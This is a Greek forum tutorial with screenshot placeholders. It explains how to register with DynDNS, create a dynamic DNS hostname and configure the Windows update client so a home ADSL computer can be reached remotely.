Βάλαμε την adsl, ωραία, αλλά υπάρχει ένα πρόβλημα θέλουμε πχ να έχουμε πρόσβαση στον υπολογιστή μας από κάποιον άλλον, αλλά οι παροχοί μας λένε "+ τόσα ευρώ"


Και όμως υπάρχει λύση!


Για αρχή θα γίνει μια ανάλυση της υπηρεσίας http://www.dyndns.org

Καθώς και οι οδηγίες θα είναι για τον client των windows
Το πρώτο που πρέπει να κάνουμε είναι να τρέξουμε τον αγαπημένο μας Browser και να πάμε στην διεύθυνση http://www.dyndns.org

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  step1.jpg 
Εμφανίσεις:  0 
Μέγεθος:  84,2 KB 
ID: 8280

Κάνουμε "κλικ" στο singup now


Εδώ πρέπει να δώσουμε κάποια στοιχεία μας (πρέπει να βάλουμε σωστό email address)

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  first1a.jpg 
Εμφανίσεις:  1 
Μέγεθος:  110,7 KB 
ID: 8281

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  first1b.jpg 
Εμφανίσεις:  0 
Μέγεθος:  89,6 KB 
ID: 8282

Εφόσον δώσουμε τα στοιχεία μας πατάμε στο "create account"


Μετά κάνουμε έλεγχο στο inbox από το email Που δώσαμε , μιας και θα μας στείλουν το μήνυμα ενεργοποίησης


Κάτι σαν αυτό

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  registeryes.jpg 
Εμφανίσεις:  0 
Μέγεθος:  8,5 KB 
ID: 8284

το ανοίγουμε

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  activate.jpg 
Εμφανίσεις:  0 
Μέγεθος:  56,9 KB 
ID: 8286

και πατάμε εκεί που λέει "to confirm your account......."

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  confirmed.jpg 
Εμφανίσεις:  0 
Μέγεθος:  59,0 KB 
ID: 8288

Πλέον είμαστε έτοιμοι, κάνουμε Login in

(Πάνω αριστερά)

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  logedin.jpg 
Εμφανίσεις:  0 
Μέγεθος:  35,1 KB 
ID: 8287


Ωραία είμαστε πλέον χρήστες..................

Τώρα τι κάνουμε;

Πρέπει να πάμε στο services

Και μετά να επιλέξουμε την επιλογή "dynamic Dns"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  dynimic.jpg 
Εμφανίσεις:  1 
Μέγεθος:  98,5 KB 
ID: 8289

Πατάμε στο "Add Dynamic DNS"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  adddyn.jpg 
Εμφανίσεις:  0 
Μέγεθος:  113,3 KB 
ID: 8290

Στο αμέσως επόμενο μενού μας δίνει την δυνατότητα να επιλέξουμε το όνομα που θέλουμε

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  adddyn2.jpg 
Εμφανίσεις:  1 
Μέγεθος:  72,6 KB 
ID: 8291

Βάζουμε ένα όνομα που μας αρέσει στο "hostname" επιλέγουμε την κατάληξη από το drop down menu, και πατάμε το "add host"

εφόσον το όνομα που διαλέξαμε δεν το έχει κάποιος άλλος θα μας εμφανίσει

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  yesdyn.jpg 
Εμφανίσεις:  0 
Μέγεθος:  61,1 KB 
ID: 8292

Ωραία μέχρι εδώ, έχουμε πλέον το δικό μας όνομα στο Internet, αλλά έχουμε πρόβλημα με την ενημέρωση αυτού (το dynamic που λέγαμε)

[break=Ρυθμίση Update client]

Όπως είπα δεν θα μιλήσω σχετικά με το πως θα περάσουμε τις ρυθμίσεις σε κάποιο ρουτερ που τα υποστηρίζει,
Θα μιλήσουμε για τον Update client τον οποίο μπορείτε να βρείτε εδώ
Η έδω


Η εγκατάσταση είναι πολύ απλή,

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set1.jpg 
Εμφανίσεις:  0 
Μέγεθος:  26,2 KB 
ID: 8294
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set2.jpg 
Εμφανίσεις:  0 
Μέγεθος:  45,7 KB 
ID: 8295
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set3.jpg 
Εμφανίσεις:  0 
Μέγεθος:  23,7 KB 
ID: 8296
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set4.jpg 
Εμφανίσεις:  0 
Μέγεθος:  22,4 KB 
ID: 8297
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set5.jpg 
Εμφανίσεις:  0 
Μέγεθος:  25,9 KB 
ID: 8298
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set6.jpg 
Εμφανίσεις:  0 
Μέγεθος:  26,5 KB 
ID: 8299
τα ωραία ξεκινάνε μετά την επιλογή "launch DNS updater"

Πρώτη κίνηση

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set21.jpg 
Εμφανίσεις:  0 
Μέγεθος:  29,0 KB 
ID: 8300

Δεύτερη

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set22.jpg 
Εμφανίσεις:  0 
Μέγεθος:  25,2 KB 
ID: 8301

Επιλέγουμε το "Local Area Network"

Συνεχίζουμε με το "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set23.jpg 
Εμφανίσεις:  0 
Μέγεθος:  26,8 KB 
ID: 8303

Επιλέγουμε το "detect my ip" (ώστε να βρει αυτόματα την Ip μας)

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set24.jpg 
Εμφανίσεις:  0 
Μέγεθος:  34,7 KB 
ID: 8304

Συνεχίζουμε με "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set25.jpg 
Εμφανίσεις:  0 
Μέγεθος:  20,2 KB 
ID: 8305

Βάζουμε ένα όνομα (για δικιά μας ευκολία)

πατάμε "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set26.jpg 
Εμφανίσεις:  0 
Μέγεθος:  20,6 KB 
ID: 8306

Δίνουμε εδώ τα στοιχεία που δώσαμε κατά την εγράφη μας

και πάλι πατάμε "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set27.jpg 
Εμφανίσεις:  0 
Μέγεθος:  33,7 KB 
ID: 8307

Μας ενημερώνει ότι έχουμε μια υπηρεσία σε αυτό το όνομα χρήστη

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set28.jpg 
Εμφανίσεις:  0 
Μέγεθος:  25,1 KB 
ID: 8308

Επιλέγουμε την υπηρεσία (checkbox) και πατάμε "Next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set29.jpg 
Εμφανίσεις:  0 
Μέγεθος:  18,8 KB 
ID: 8309

Τσεκάρουμε το "enable automatic updates", πατάμε "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  finish.jpg 
Εμφανίσεις:  0 
Μέγεθος:  18,4 KB 
ID: 8310

Και "finish"

Καλορίζικο το static "DNS"